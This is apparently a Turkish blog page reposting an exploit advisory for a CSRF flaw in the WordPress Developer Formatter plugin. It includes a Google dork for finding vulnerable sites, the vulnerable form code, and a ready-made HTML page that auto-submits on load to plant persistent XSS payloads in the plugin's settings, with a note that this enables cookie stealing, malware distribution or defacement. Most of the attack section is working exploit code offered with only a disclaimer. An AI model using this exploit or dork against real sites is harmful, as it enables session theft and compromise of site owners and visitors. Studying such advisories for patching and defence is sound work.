Tag Archive for Wordpress Developer Formatter XSS Açığı

WordPress Developer Formatter CSRF Vulnerability

WordPress Developer Formatter CSRF ve XSS açıkları bulunmuştur.
Açığın oluşum yeri ve Açığın kullanımı hakkında açıklamalar şu şekilde;

====================================================================================================================
# Exploit Title: WordPress Developer Formatter CSRF Vulnerability
# Google Dork: inurl:devformatter/devformatter.php
# Date: 21/01/13
# Author: Junaid Hussain -[ illSecure Research Group ] -
# Contact: illSecResearchGroup@Gmail.com | Website: illSecure.com
# Software Link: http://wordpress.org/extend/plugins/devformatter/
# Vendor: http://wordpress.org/extend/plugins/devformatter/
# Tested on: CentOS 5  
# Version: WordPress Version 3.5, Should work on all versions.

====================================================================================================================
[#] Vulnerable Code
Page: devinterface.php - Line: 46  
 <form method="post" action="options-general.php?page=devformatter/devformatter.php">
[#] no nonce given - Read: http://codex.wordpress.org/Function_Reference/wp_nonce_field
====================================================================================================================
// CSRF Exploit:
<html>
<body onload="javascript:document.forms[0].submit()">
<form method="post" action="http://[DOMAIN NAME]/wp-admin/options-general.php?page=devformatter/devformatter.php">
<input name="usedevformat" style="display:none;" type="checkbox" checked/> 
<input name="copyclipboartext" type="text" style="display:none;" value="&lt;/textarea&gt;<script>alert(/xss/)</script>"  />
<input name="showtools" style="display:none;" type="checkbox" checked/> 
<textarea name="devfmtcss" rows="6" cols="60" style="display:none;"> 
	  body {
  background-image: url('javascript:alert("XSS");') !important;
}
&lt;/textarea&gt;
 </form></html>
====================================================================================================================
[#] copyclipboartext & devfmtcss are both vulnerable to persistent xss which could lead to cookie stealing,
    malware distribution or even a defacememnt.
[#] Disclaimer: This exploit is for Research/Educational/Academic purposes only, 
                The Author of this exploit takes no responsibility for the way
                you use this exploit, you are responsible for your own actions.	
====================================================================================================================
Original: http://illsecure.com/code/Wordpress-DevFormatter-CSRF-Vulnerability.txt